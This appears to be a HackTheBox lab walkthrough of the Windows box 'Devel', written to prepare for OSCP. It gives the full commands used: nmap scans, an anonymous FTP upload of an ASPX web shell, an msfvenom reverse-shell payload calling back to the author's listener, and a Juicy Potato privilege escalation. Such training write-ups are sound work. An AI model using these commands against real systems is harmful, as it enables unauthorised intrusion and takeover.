Another OSCP-like Box: Devel
Devel is a Windows machine that is rated as an easy box in HackTheBox. It’s IP is 10.10.10.5.
Enumeration
Nmap
I always use Nmap to start my enumeration.
sudo nmap -sC -sV -Pn -oA default-script 10.10.10.5
- -sC, this invokes the default NSE script scan
- -sV, this performs Version scan
- -Pn, this performs ports scan without send a ping request first.
- -oA, this will save the result to a greppable, xml and normal nmap outputs
Nmap Automator
For the purpose of OSCP, I ran a tool called Nmap Automator to perform enumeration in parallel. This tool can be downloaded from this link. In real-world engagement, I would be mindful of the network traffic that is being generated by this tool. I don’t like to cause unnecessary denial of service.
nmapautomator 10.10.10.5 All
The Nmap result showed that TCP ports 21 and 80 are open.
Port 21
The FTP service has no version information. I couldn't check for a specific vulnerability and exploit for this service. I however had Anonymous access to the server and file upload is not restricted in this directory.
ftp 10.10.10.5
I used the anonymous user and any random password as credentials.
In a separate terminal, I created a random file named test.txt.
I then uploaded the file using PUT command in FTP.
Port 80
The web server is running IIS 7.5 . It seemed that It’s just a default installation of IIS server. I tried to download the image and noticed that it’s name is welcome.png. This is the same file that is exposed in the FTP directory.
I checked the text.txt file using a browser and I was able to view it.
My next step was to look for any asp or aspx web shells in Kali. Web Shells are malicious script used by attackers and penetration testers to gain some type of code execution in the target server. Asp or aspx files are normally executed by IIS.
I tried both asp and aspx web shells and I had great success with aspx files.
locate *aspx
cp /usr/share/webshells/aspx/cmdasp.aspx .
Using FTP, I then uploaded cmdasp.aspx web shell to the IIS server.
put cmdasp.aspx
I then then browsed the web shell and tested the command execution.
whoami&&hostname
Reverse Shell
I wanted to get a proper reverse shell, so I generated a binary using Msfvenom. Msfvenom is a Metasploit-Framework tool that generates stand-alone payloads.
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.16 lport=4444 -f exe -o shell.exe
- -p specifies the Payload.
- lhost specifies the IP of my Kali
- lport specifies my listening port. I used port 4444
- -f selects the file type, which is an executable
- -o invokes the filename, I named the binary as shell.exe
I connected again to the FTP server, changed the mode to binary and uploaded shell.exe.
binary
put shell.exe
The IIS default home directory is C:\inetpub\wwwroot. I verified the file directory and located the shell.exe binary.
dir C:\inetpub\wwwroot
I then setup a Netcat listener on port 4444.
Next, I executed shell.exe to get a reverse shell.
C:\inetpub\wwwroot\shell.exe
Privilege Escalation
I started again my enumeration in this local box manually. I ran “systeminfo” to get basic information of the target.
Since this an old Windows Operating System, I checked if this host is vulnerable to Token Impersonation vulnerability. A good explanation about this vulnerability is found here.
whoami /priv
The result showed that SeImpersonatePrivilege is allowed in this shell. This means that the target is possibly vulnerable to Token Impersonation attack. SeImpersonatePrivilege is normally found in service accounts but not in regular user accounts.
I then downloaded an exploit binary from this link.
cp ~/Downloads/Juicy.Potato.x86.exe .
I connected again using FTP, ran in binary mode and uploaded the Juicy.Potato.x86.exe exploit.
binary
put Juicy.Potato.x86.exe
In the reverse shell, I changed my directory to C:\inetpub\wwwroot,
cd C:\inetpub\wwwroot\
In another terminal, I ran another Netcat listener on port 4444.
Finally, I executed the following command to escalate my privilege:
Juicy.Potato.x86.exe -l 4444 -p “C:\inetpub\wwwroot\shell.exe” -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
Please refer to this link for the exact explanation of the syntax used.
If the command above will not work, try other CLSID or Class ID from this link. Class ID is a serial number that represents a unique ID for any application components in a Windows system.
Flags
Lessons Learned
- In a target when we have a way to upload files, find another way to execute the files. In this box, we uploaded our file using FTP and executed it using a web server.
- Don’t forget to run the “binary” mode in FTP, if we are transferring a binary through FTP.
- Its not a best practice to allow anonymous login in FTP and exposing the the default folder of IIS server.
- Follow the best practice against Token Impersonation attacks. Start with this link from MITRE.
